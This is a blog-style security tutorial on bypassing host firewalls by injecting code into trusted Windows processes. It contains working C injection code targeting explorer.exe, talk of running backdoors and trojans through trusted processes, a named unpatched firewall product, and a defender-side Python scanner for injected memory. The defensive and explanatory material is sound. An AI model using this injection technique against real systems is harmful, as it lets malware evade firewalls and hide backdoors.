3 Jan
How to Bypass a Firewall with Process Injection
Hello Friends.
The first question is: why process injection?
With this method we can attach an evil process to a permitted one. As you know, firewalls permit some processes, like Internet Explorer [IE], Firefox, Windows Update, etc. These processes can connect to the Internet very well [most of the time].
Process injection, DLL injection and "PE injection" are methods to bypass firewalls [these methods are called firewall leaks].
In DLL injection, we inject a DLL into an application's process space and the malicious DLL runs there, so the firewall believes it is the trusted application that is using the network.
Today, when we talk about injection, we are talking about a DLL that is loaded into a running process's memory. Windows is designed to allow this, and injection techniques can be used by any application. Some applications use it to add features to a closed-source program [for example, Babylon Dictionary is one of them].
I don't intend to talk about DLL injection in detail this time; I just want to talk about process injection [or hijacking] to bypass firewalls.
Pay attention to the following diagrams:
Principle of how an application runs [default]:
When a dynamic library [DLL] is included:
Inserting malicious code into a trusted process:
Using Internet Explorer [trusted software] for injection:
The following illustration shows general code injection with the Windows API method [VirtualAllocEx(), ...].
How to inject into a process [with C code]:
For the firewall bypass we have 4 parts:
- Open one process "P"
- Allocate memory remotely in P's address space
- Copy the code to the remote process
- Create a thread to execute the code remotely
[this is what happens]
Example of process injection into EXPLORER.EXE [code]:
```c
#pragma comment(lib,"Shlwapi.lib")
#pragma comment(lib,"ADVAPI32.LIB")
#include <stdio.h>
#include <windows.h>
#include <Shlwapi.h>
#include <tlhelp32.h>
#define INJECT_EXE "explorer.exe"

/* Parameter block copied into the target; holds resolved API addresses
   and the strings the remote thread uses. */
typedef struct _RPar {
    DWORD dwDeleteFile;
    DWORD dwSleep;
    DWORD dwMessageBox;
    char Filename[1024];
    char string1[1024];
    char string2[1024];
} RPar;

/* Code that runs inside the target process. It must not reference anything
   from this image directly, so every API is called through the addresses
   passed in RPar. */
DWORD __stdcall ThreadProc(RPar *Para)
{
    FARPROC PDeleteFile = (FARPROC)Para->dwDeleteFile;
    FARPROC PSleep = (FARPROC)Para->dwSleep;
    FARPROC PMessageBox = (FARPROC)Para->dwMessageBox;
    PMessageBox(NULL, Para->string1, Para->string2, MB_OK);
    while (PDeleteFile(Para->Filename) == 0) { PSleep(1000); }
    return 0;
}

int _stdcall WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR lpCmd, int nCmdShow)
{
    DWORD dwThreadId, pID = 0, dwThreadSize = 2048;
    void *pRemoteThread;
    char ExeFile[1024];
    HANDLE hProcess, hSnap;
    HINSTANCE hKernel, hUser;
    RPar my_RPar, *pmy_RPar;
    PROCESSENTRY32 pe32 = {0};

    /* Find the PID of the target by walking the process snapshot. */
    if ((hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) == INVALID_HANDLE_VALUE)
        return 3;
    pe32.dwSize = sizeof(PROCESSENTRY32);
    Process32First(hSnap, &pe32);
    do {
        if (StrCmpNI(INJECT_EXE, pe32.szExeFile, strlen(INJECT_EXE)) == 0) {
            pID = pe32.th32ProcessID;
            break;
        }
    } while (Process32Next(hSnap, &pe32));
    if (hSnap != INVALID_HANDLE_VALUE) CloseHandle(hSnap);

    /* Part 1: open process "P". */
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pID);
    /* Part 2: allocate memory remotely in P's address space. */
    pRemoteThread = VirtualAllocEx(hProcess, 0, dwThreadSize,
                                   MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    /* Part 3: copy the code to the remote process. */
    WriteProcessMemory(hProcess, pRemoteThread, &ThreadProc, dwThreadSize, 0);

    ZeroMemory(&my_RPar, sizeof(RPar));
    hKernel = LoadLibrary("kernel32.dll");
    my_RPar.dwDeleteFile = (DWORD)GetProcAddress(hKernel, "DeleteFileA");
    my_RPar.dwSleep = (DWORD)GetProcAddress(hKernel, "Sleep");
    hUser = LoadLibrary("user32.dll");
    my_RPar.dwMessageBox = (DWORD)GetProcAddress(hUser, "MessageBoxA");
    GetModuleFileName(NULL, ExeFile, 1024);
    printf("%s\n", ExeFile);
    strcpy(my_RPar.Filename, ExeFile);
    strcpy(my_RPar.string1, "HI Abysssec");
    strcpy(my_RPar.string2, "OK");
    pmy_RPar = (RPar *)VirtualAllocEx(hProcess, 0, sizeof(RPar), MEM_COMMIT, PAGE_READWRITE);
    WriteProcessMemory(hProcess, pmy_RPar, &my_RPar, sizeof my_RPar, 0);

    /* Part 4: create a thread to execute the code remotely. */
    CreateRemoteThread(hProcess, 0, 0, (DWORD (__stdcall *)(void *))pRemoteThread,
                       pmy_RPar, 0, &dwThreadId);
    FreeLibrary(hKernel);
    CloseHandle(hProcess);
    system("tasklist");
    return 0;
}
```
What happens when the firewall is bypassed?
On servers:
We can call "Internet Explorer" or another trusted application with [ASP.NET execute permission] and run a backdoor on any port.
With this method we can telnet to the server's open port without any worry.
On clients:
Backdoors, trojans and bad software connect to the Internet without having been granted access.
Real-world test [discovered by Abysssec]:
Vulnerable firewall [Outpost 2009]:
http://www.agnitum.com/products/outpost/
You can inject into the IE7 or Mozilla Firefox process [trusted by default].
[Sorry, no more information: this bug is not fixed yet. You can test it with process injector tools.]
www.tarasco.org
[pinjector.exe]:
Download link + source:
http://www.tarasco.org/security/pinjector/index.html
Final deductions:
1- We can bypass some firewalls: they don't check memory allocated inside a trusted process.
2- DLL, process and PE injection are useful ways to run code without a new process ID [PID].
In the future:
1- Using these methods to bypass other protections [hybrid or free protections]
2- PE injection: why, what, where!?
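Deduction 1 is the root cause: a firewall that trusts a process by its image name never looks at what that process's address space now contains. The following added example (not from the original post) shows the check such a product, or an incident responder with a memory dump, would apply: classify each committed region the way VirtualQueryEx describes it and flag executable private memory, RWX pages, and PE headers sitting in private memory (the PE-injection variant). The region records and the sample process map are constructed; on a live Windows host they would come from VirtualQueryEx plus ReadProcessMemory for the first bytes.

```python
"""Classify memory regions of a trusted process to find injected code.

Added defender-side example; not from the original post. Each region dict
mimics a MEMORY_BASIC_INFORMATION record (BaseAddress, RegionSize, State,
Type, Protect) plus the mapped file, if any, and the first bytes of the
region. SAMPLE_MAP is constructed for the demonstration.
"""

# winnt.h constants
MEM_COMMIT = 0x1000
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000
PAGE_READONLY = 0x02
PAGE_READWRITE = 0x04
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
EXECUTABLE_MASK = (PAGE_EXECUTE | PAGE_EXECUTE_READ
                   | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)


def classify_region(region):
    """Return the reasons a committed region looks like injected code ([] if clean)."""
    reasons = []
    if region["State"] != MEM_COMMIT:
        return reasons
    private = region["Type"] == MEM_PRIVATE
    executable = bool(region["Protect"] & EXECUTABLE_MASK)
    if private and executable:
        # Legitimate code lives in MEM_IMAGE regions backed by a file on disk;
        # VirtualAllocEx'd code has no such backing.
        reasons.append("executable code in private memory that no module backs")
    if region["Protect"] == PAGE_EXECUTE_READWRITE:
        reasons.append("region is writable and executable at once (RWX)")
    if private and region["Head"][:2] == b"MZ":
        # Only private memory counts: a DLL opened as data shows up as a
        # MEM_MAPPED view with an MZ header and is not injection.
        reasons.append("PE header in private memory (manually mapped image)")
    return reasons


def scan(process_map):
    """Return [(base_address, reasons)] for every suspicious region."""
    findings = []
    for region in process_map:
        reasons = classify_region(region)
        if reasons:
            findings.append((region["BaseAddress"], reasons))
    return findings


# Constructed sample map of a trusted process after an injection (not real data).
SAMPLE_MAP = [
    # .text of the host image: executable, but backed by explorer.exe
    {"BaseAddress": 0x00FC1000, "RegionSize": 0x200000, "State": MEM_COMMIT, "Type": MEM_IMAGE,
     "Protect": PAGE_EXECUTE_READ, "MappedFile": r"C:\Windows\explorer.exe", "Head": b"\x8b\xff\x55\x8b"},
    # ordinary heap
    {"BaseAddress": 0x00A00000, "RegionSize": 0x10000, "State": MEM_COMMIT, "Type": MEM_PRIVATE,
     "Protect": PAGE_READWRITE, "MappedFile": None, "Head": b"\x00\x00\x00\x00"},
    # remotely allocated RWX block holding copied-in thread code
    {"BaseAddress": 0x00A20000, "RegionSize": 0x1000, "State": MEM_COMMIT, "Type": MEM_PRIVATE,
     "Protect": PAGE_EXECUTE_READWRITE, "MappedFile": None, "Head": b"\x55\x8b\xec\x83"},
    # remotely allocated parameter block: data only, not flagged by itself
    {"BaseAddress": 0x00A30000, "RegionSize": 0x1000, "State": MEM_COMMIT, "Type": MEM_PRIVATE,
     "Protect": PAGE_READWRITE, "MappedFile": None, "Head": b"\x10\x3a\x7c\x75"},
    # a DLL mapped as a plain file view (MZ header, but MEM_MAPPED): benign
    {"BaseAddress": 0x01400000, "RegionSize": 0x100000, "State": MEM_COMMIT, "Type": MEM_MAPPED,
     "Protect": PAGE_READONLY, "MappedFile": r"C:\Windows\System32\shell32.dll", "Head": b"MZ\x90\x00"},
    # a manually mapped PE in private RWX memory (PE injection)
    {"BaseAddress": 0x02000000, "RegionSize": 0x40000, "State": MEM_COMMIT, "Type": MEM_PRIVATE,
     "Protect": PAGE_EXECUTE_READWRITE, "MappedFile": None, "Head": b"MZ\x90\x00"},
]

if __name__ == "__main__":
    for base, reasons in scan(SAMPLE_MAP):
        print(f"0x{base:08X}: " + "; ".join(reasons))
```

The MEM_MAPPED exclusion is deliberate: scanners that flag every MZ header they see drown in false positives from files opened as data, while the private-memory rule catches both the 2048-byte thread stub from the C sample and a fully mapped PE.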
More information:
http://www.tarasco.org/security/pinjector/Win32.Design.Flaws.pdf
http://www.firewallleaktester.com/docs/leaktest.pdf
http://www.bluenotch.com/files/Shewmaker-DLL-Injection.pdf
--------------------------------------------------------------------------------------
Happy New Year and happy holidays.
God speed you.
Daphne